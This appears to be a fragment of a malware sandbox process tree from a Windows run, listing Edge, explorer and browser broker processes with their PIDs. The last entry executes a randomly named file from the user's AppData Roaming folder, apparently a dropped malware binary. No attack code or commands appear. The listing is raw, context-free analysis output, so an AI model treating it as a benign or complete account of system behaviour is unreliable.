C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6504
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1832
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9592
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:9712
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6952
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8528
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6284
-
C:\Users\Admin\AppData\Roaming\jarfudrC:\Users\Admin\AppData\Roaming\jarfudr1⤵PID:9028